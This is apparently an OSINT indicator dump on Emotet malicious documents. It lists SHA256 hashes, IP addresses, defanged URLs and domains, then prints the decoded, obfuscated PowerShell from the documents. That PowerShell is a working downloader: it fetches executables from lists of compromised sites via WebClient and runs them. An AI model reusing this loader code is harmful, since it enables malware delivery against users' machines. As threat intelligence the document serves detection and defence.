Emotet_Doc_out_2020-09-28_21_52.txt

#Emotet #Docs #malware #OSINT #IOC

SHA256:
89330bfd1e55e367418cde1f916544fbcc67b1e91f018b1ae886e0126bc56aa9
f7cffbe586a143c6f536e5b1b6e586504b46f8f74e5b8c1bed7eb63ea6f83c56
614c937446ff663272b12024b799c803935aafdf6c51f49ddc2b345084f6c458
a48347d6261928fa3e7e6d5bfd62588b4396a3144bbd63ce8d7d89eed8509867
d95d47b0ff10920b9414f3bb0e07d3127090d45956719953e2c3e29d7ff6d326
9e9d0d2075fc44e62f8bffd65480741ac00e708030fbdbd2486d66a7fa37dd9d
85b05659e9157af806f3d1861f5a87cb6e3955b3fa30e8c9a9148f8c78426848
18a489cd7e886b67ff5d2f0ffcfa32b761623dcb8fb7a092d6e504bed253bf27
41e08c76f63ad10eef590e50d46391f44edd31b9f81ff6df0a2eaf6fc2444646
05d7164a911316ca65eef36fb07402a3eab4e12a6725715aa2ca44439e9b4947
fb004b38ebd96bf8001ccc0bd7c02e886119c1edc18faf87dbd19238a15673ce
28a4375c5b9b8810beab924e04ca34cba98e1beb9994113664043fa471fc19e4
4893d5828613a7b157505151182a80ad894439fe4f65ebeb87fcf641880ca47a
fee318109ac625c238203df465474f86adc5f4590100250c5dc26fb3a99e4a72
9021f238c3c11aef5eae9f68513835b58b7032286c556184df18e151c7923080
01bd1ac3283be5ae08dec7a54aa614d97721d276b8b567a98c0fde8337c7096b
984e84ac950ad50b540bfd1610b17d5c9c8b78c09f0645205575be175b5757cc
4569bc2e1ac13672c6927936f038ddf0e88b3de1fff148824ea53136f3aa7c8f
496411399a286edad62ecc5b25c4d2da4c6e10e7c521d21f46ed7600d3eccaa0
5d2d7e4e3c6daa4a02eb08946df943a93c057842803821af60b0f904c21f0ee3
0a767fdea3579f267b84dcc7d9c43f536e7cdf255908c7a09818dfc636cd5509
be027062620f1062ab92b25ee0812680b04f228fbba468a7c1accd783612a2b2
6d88030d214293240999afc9cf59de47fa3937bf52ba7e32edbca244fa1f59b0
7215b629b74ee47ae48acadb425bb8429fdabad98d22d68b42fc18bf6b7d84e7
a5e463dc77ddef7c9f9ec1a373b6af6ea06c7b25202ebf57189470b264cd32e0
393a299b00878cc2ee1144a56c9a9a50d7201d9e2a6d9f88a5100e0ea644ed25
6bf0c29b676a14ea5bce84f7837e298ea09f7d14c0856ff46639e8e418131888
6ed43227b066756eb43c26ee9c02bca79a3e855c524b24dcfe4b0ad5599164ed
0e0e0433ed03da08a0f5c04edc298d1fb7d169e296a5395752903154946ee846
632f88366e620aea2c0933d4faf76bb6df0ab4b6d4c8b4ca5fb6d5b60e859ebc
f03c18b8a3f849e1ec67fe282922d0d6eb2b014434ec1943718d96248d8fddfd
195918c64e63b45531349c13f9f0ac6099a53d6d05974498542a7f38acc6d247
08a4f15bc80d74cee9e99f6f8abffab083d993aeb388fdcc87491915139de532
c7678263136c72eae4c2d6509a5b7b56e6a1737087b40b9757c0bc424b627fd5
d00cd2a1d883f7305bdf064b1c55b0a123c633b96f1ba936d9a261e4b04fee72
f4cb257106066de46de71a0437a02d81290c038478d9df98c82b84b9b61aa5b3
fa457b662c69a26dc04e4e4253971693003c4586f3d6abb56a15f547f0531f55
a3bd205080725ad3e20e6aab3c672e8d19ac2249485569d1db861f68c26ae867
6e8acc71f742ac45af6ef1dfd96fb8403d8e795bf0a0cc78beda364bc40fb765
5b297371f4d6bc9ca72f58047899aef360743be5b6fe8486f09ffe3ce04bff80
7ca389d216c23f6c7a94e5f2e0a67a958f33303898c23dcd6563427b2c5d48eb
35aad15ac4c313a88d3956672f6fcb9c4447c86d156e49982bc7c0b29e35252d
8d949a82a15f90565e204f6710e5c0d0cd258fbfa73248403b9742d0058e0ea5
a5a023e17e92bc3fcd171e69ccd37fe1f09b68a0e7a5f01c52a66e1822023bf3
71a38628c591821a166a062d506bc6b46796bf94f17b1bcc092bb41dec8c3ba1
071e566fdd288ea18840e688b3e0fda6eba45adbe3fa06cb2b00243990d04c48
3cb13ded7feec80287617314a5afb7c7b8329e42c771f850c6de443ce33869f4
7ae64e73b77a76c37850645d5e26f54f79a7306f0379d040bcb29a7f2ebfb6c4
d524d840e2f372d6559b21160c1c6f7008c7092896b36697b24d4e399aa6d19e
7a2cc10b8467271c1aa95c0274c068e60a4a9001f15a09d44dca9321a728e2db
a0e2b2e8156f518733940d037cc511d0fb14dd4a37a0123d5c3379142d8e00ae
242dcb53dd84cd6890f1c61a5e2a32e7c19fd4ac101e7eddc0e00dfd3a6da7dd
41615ec001f35fdb219329fe6ccd3b5af2a5c7f4018756e9a825dae3e8a0d2e3
c483ebb2a992e840375a7bcd385b986fb4cc09e32c5f7a9902f4666c56fbb052
99ae905c7f83f80aba5616fbf18b0dfc22f515189bf072c1b7a01ad4106ad63a
57c58c900dab653da8caedcba6e126468976c2a5619e1aeafbd5ef76caa34f96
68b91deb1209839e8f06699c3c90941a9bc54364b52f189497451b8da33ab8f1
97d97232a22fd7979e1058085c211e6353a9312e3f1e899d808815adeccd3819


IPs:
103.129.99.42
103.48.50.159
104.18.50.125
104.18.51.125
104.27.169.236
104.27.184.50
104.27.185.50
13.229.25.57
141.138.168.108
148.66.138.103
162.214.93.54
172.105.51.130
172.67.194.210
172.67.212.130
177.12.163.114
178.128.103.36
185.98.131.234
187.1.136.61
192.185.114.115
192.185.129.112
192.185.223.120
192.185.7.82
192.232.199.54
198.12.144.78
199.231.162.226
201.148.107.227
208.91.199.230
216.70.123.83
3.13.43.20
3.23.235.182
35.208.84.24
45.33.106.181
45.79.197.108
46.23.76.228
51.91.118.206
67.225.255.188
79.172.252.17
89.46.106.84
98.142.102.90


URLs:
hxxp://hopekonnect.com/cgi-bin/v3DD/
hxxp://cabinetaccuracy.com/wp-includes/n90DBu/
hxxp://ksulo.com/wp-admin/NvruA/
hxxps://travcalls.com/blogs/bslVh/
hxxps://raanivastra.com/wp-content/q/
hxxp://231brewingco.com/wp-includes/gwUy/
hxxp://mealeapalacegate.com/cgi-bin/G/
hxxp://voguefitz.com/wp-content/se/
hxxp://www.coop-yeboekon.net/wp-admin/w/
hxxps://hotelunique.com/cardapios/T8U/
hxxps://prafulloorja.org/2wvl/P/
hxxp://turbineseuperfil.online/sitetarget/7G/
hxxp://guarany.net/zefiro/DDI/
hxxps://fairplay.company/wp-includes/00/
hxxp://ibccglobal.com/thankyou2/ARA/
hxxp://work.digitalvichar.com/1mv7clu/o/
hxxp://13.229.25.57/7xdfb/jpA/
hxxp://binarystationary.com/cgi-bin/5rM/
hxxp://fmcav.com/images/ZQF/
hxxps://kodiakheating.com/ldnha/ybI/
hxxps://khvs.vrfantasy.gallery/igiodbck/eXq/
hxxp://digimarketery.com/wp-admin/p/
hxxp://www.mdmfashionbrand.com/softaculous/E6/
hxxp://unicusadvisors.com/wp-content/plugins/wp-file-manager--/3/
hxxp://castilloreservado2.com/wp-content/D/
hxxps://edwardlongmire.com/w2ei/hI/
hxxp://mathispros.sctestinglab.com/wp-content/5/
hxxps://samsportal.org/images/9p/."sP`Lit"[char]42;
hxxp://famousdiagnosticcenter.com/wp-admin/7wX/
hxxp://www.govtcollegesihunta.com/wp-includes/hX/
hxxp://jegsnet.com/wp-content/lPr/
hxxp://fenekformalas.newquantumlogic.com/webstat/G/
hxxp://helixity-india.com/wp-content/M/
hxxps://www.buntebenelux.com/wp-admin/cbW/
hxxp://swso2.com/wp-admin/a/
hxxp://buddinosaur.us/wp-includes/gdNzHVmMo/
hxxp://cannabisdiscoverycenter.com/wp-includes/hvzL/
hxxp://criterianexpress.com/cgi-bin/q9Ghl/
hxxp://www.kheshtkhane.com/wp-admin/d4/
hxxp://www.sabbathcovenant.com/wp-content/HgFPlMBeU/


Domains:
www.sabbathcovenant.com
www.kheshtkhane.com
criterianexpress.com
cannabisdiscoverycenter.com
buddinosaur.us
hopekonnect.com
cabinetaccuracy.com
ksulo.com
travcalls.com
raanivastra.com
231brewingco.com
mealeapalacegate.com
voguefitz.com
www.coop-yeboekon.net
hotelunique.com
prafulloorja.org
turbineseuperfil.online
guarany.net
fairplay.company
ibccglobal.com
work.digitalvichar.com
13.229.25.57
binarystationary.com
fmcav.com
kodiakheating.com
khvs.vrfantasy.gallery
digimarketery.com
www.mdmfashionbrand.com
unicusadvisors.com
castilloreservado2.com
edwardlongmire.com
mathispros.sctestinglab.com
samsportal.org
famousdiagnosticcenter.com
www.govtcollegesihunta.com
jegsnet.com
fenekformalas.newquantumlogic.com
helixity-india.com
www.buntebenelux.com
swso2.com


Decoded Base64 Powershell:
<���^,$Zi30wqm=Tz7pdsn;
.new-item $Env:uSERproFIle\j9Myg28\zwvQN08\ -itemtype direcToRy;
[Net.ServicePointManager]::"S`E`CUr`ItypRoT`oCol" = tls12, tls11, tls;
$Lq4p28v = C2zl3hos;
$Fvxhras=Sptfwi9;
$Gptvi48=$env:userprofilehbqJ9myg28hbqZwvqn08hbq -crEplAcEhbq,[ChAr]92$Lq4p28v.exe;
$Y8s7sir=Ymwjvm4;
$F54aoea=&new-object net.WebclIENT;
$Eybm688=hxxp://hopekonnect.com/cgi-bin/v3DD/
hxxp://cabinetaccuracy.com/wp-includes/n90DBu/
hxxp://ksulo.com/wp-admin/NvruA/
hxxps://travcalls.com/blogs/bslVh/
hxxps://raanivastra.com/wp-content/q/
hxxp://231brewingco.com/wp-includes/gwUy/
hxxp://mealeapalacegate.com/cgi-bin/G/."SPL`iT"[char]42;
$Gqo61gj=J7oc6rs;
foreach$Nzwcje6 in $Eybm688{try{$F54aoea."DoWNLoa`DfI`LE"$Nzwcje6, $Gptvi48;
$T14k7wb=Cojfoi0;
If .Get-Item $Gptvi48."LeN`gtH" -ge 27700 {&Invoke-Item$Gptvi48;
$R7g5d84=Vsx6por;
break;
$Ct7ts0x=K2l9ekf}}catch{}}$Zqgwmzy=Ayceofz<���^,$Ghbjljw=N_ft5f7;
&new-item $ENV:UsERpRofiLe\olgTQfS\wDA5Pgn\ -itemtype dirECToRY;
[Net.ServicePointManager]::"SeCUR`ITY`P`ROtoc`Ol" = tls12, tls11, tls;
$Havi8kl = Pt8izs8v5;
$Tuywyey=Zzjbymz;
$Smpxyzq=$env:userprofilegvMOlgtqfsgvMWda5pgngvM."Repl`Ace"gvM,\$Havi8kl.exe;
$Aqa_k1i=F8jec3l;
$Qku2w17=&new-object neT.wEBCLient;
$F0cquoo=hxxp://voguefitz.com/wp-content/se/
hxxp://www.coop-yeboekon.net/wp-admin/w/
hxxps://hotelunique.com/cardapios/T8U/
hxxps://prafulloorja.org/2wvl/P/
hxxp://turbineseuperfil.online/sitetarget/7G/
hxxp://guarany.net/zefiro/DDI/
hxxps://fairplay.company/wp-includes/00/."Sp`liT"[char]42;
$Larc78l=Wahg1u6;
foreach$G9srt7a in $F0cquoo{try{$Qku2w17."DoW`NLoad`F`ILE"$G9srt7a, $Smpxyzq;
$Ncrqv6a=Ixp37t2;
If .Get-Item $Smpxyzq."Le`NGTh" -ge 24020 {&Invoke-Item$Smpxyzq;
$Uwy6x3e=Zejscmy;
break;
$Rwak77w=L2jruel}}catch{}}$Z380g27=Ilv12ui<���^,$Sch4zj2=Z_zrj3a;
.new-item $EnV:UsERPROfile\Ic4EGVu\C_zSk5X\ -itemtype dIrectoRY;
[Net.ServicePointManager]::"s`EcU`R`ITy`pRoTOCol" = tls12, tls11, tls;
$Ix8xpnq = Bp6p4xpk;
$P8ppyft=R8ngy6d;
$Wfo_odf=$env:userprofile{0}Ic4egvu{0}C_zsk5x{0} -F [ChaR]92$Ix8xpnq.exe;
$Bfh7dum=Dq70hpc;
$Uryb0di=.new-object NET.WEBCLient;
$Wepbdfo=hxxp://ibccglobal.com/thankyou2/ARA/
hxxp://work.digitalvichar.com/1mv7clu/o/
hxxp://13.229.25.57/7xdfb/jpA/
hxxp://binarystationary.com/cgi-bin/5rM/
hxxp://fmcav.com/images/ZQF/
hxxps://kodiakheating.com/ldnha/ybI/
hxxps://khvs.vrfantasy.gallery/igiodbck/eXq/."spL`it"[char]42;
$Xhdnmml=Eru6xnp;
foreach$Xs0hsv2 in $Wepbdfo{try{$Uryb0di."Do`W`NlOaD`FilE"$Xs0hsv2, $Wfo_odf;
$Ue2shos=Oqjiku3;
If &Get-Item $Wfo_odf."LeN`g`TH" -ge 25571 {.Invoke-Item$Wfo_odf;
$Sjq22_1=J1w_sm3;
break;
$Ihdyvqt=B48cdux}}catch{}}$Ha9e04b=Ay6z8bc<���^,$U33oh_w=Izkiqfm;
.new-item $enV:UsERProFilE\KPV1z52\ER0vDnY\ -itemtype DireCtORy;
[Net.ServicePointManager]::"sEC`Ur`ityp`RoTO`Col" = tls12, tls11, tls;
$L6b7rht = Tmkr9st;
$Dmjvbv7=Euc1pem;
$F76pbaf=$env:userprofilekUmKpv1z52kUmEr0vdnykUm-cRePLaCE  kUm,[ChAR]92$L6b7rht.exe;
$Ujoausd=Ds42chu;
$Zaa_jbo=.new-object NET.wEbClIeNt;
$Isx1dra=hxxp://digimarketery.com/wp-admin/p/
hxxp://www.mdmfashionbrand.com/softaculous/E6/
hxxp://unicusadvisors.com/wp-content/plugins/wp-file-manager--/3/
hxxp://castilloreservado2.com/wp-content/D/
hxxps://edwardlongmire.com/w2ei/hI/
hxxp://mathispros.sctestinglab.com/wp-content/5/
hxxps://samsportal.org/images/9p/."sP`Lit"[char]42;
$Goj62bk=Vhb7cxb;
foreach$Rk717si in $Isx1dra{try{$Zaa_jbo."Dow`NL`Oa`dfilE"$Rk717si, $F76pbaf;
$A6yyes6=Giqu3ea;
If &Get-Item $F76pbaf."LE`NG`TH" -ge 39732 {&Invoke-Item$F76pbaf;
$Uqb7r12=Qhnrh0t;
break;
$E2ht8g2=Qwsw1_z}}catch{}}$B7kga3t=Xzslsgb<���^,$Vpl5t52=E9gtdmu;
&new-item $eNV:USeRpRofILe\Hczf2vn\am0h2wd\ -itemtype diReCtOrY;
[Net.ServicePointManager]::"SEcuRIT`YP`RoTo`C`oL" = tls12, tls11, tls;
$Wk8gfh_ = Aa85xqi4;
$Onih7ji=Rm27fzq;
$K4iovfc=$env:userprofilei4gHczf2vni4gAm0h2wdi4g  -CREPLacEi4g,[chAr]92$Wk8gfh_.exe;
$R04p6uz=Hh11kvo;
$Oqozw2i=&new-object Net.WeBclIENT;
$Dk8a4at=hxxp://famousdiagnosticcenter.com/wp-admin/7wX/
hxxp://www.govtcollegesihunta.com/wp-includes/hX/
hxxp://jegsnet.com/wp-content/lPr/
hxxp://fenekformalas.newquantumlogic.com/webstat/G/
hxxp://helixity-india.com/wp-content/M/
hxxps://www.buntebenelux.com/wp-admin/cbW/
hxxp://swso2.com/wp-admin/a/."SpL`iT"[char]42;
$Mp_rs4l=Ymp_536;
foreach$V_ih7lw in $Dk8a4at{try{$Oqozw2i."dOw`NLOAdF`iLE"$V_ih7lw, $K4iovfc;
$Ls9rpov=Rq8zut8;
If .Get-Item $K4iovfc."Le`NgTH" -ge 21777 {&Invoke-Item$K4iovfc;
$Oo21_57=Drsfz0t;
break;
$Jj4y83d=A4c8xfp}}catch{}}$Ibkndxq=B5k9d5_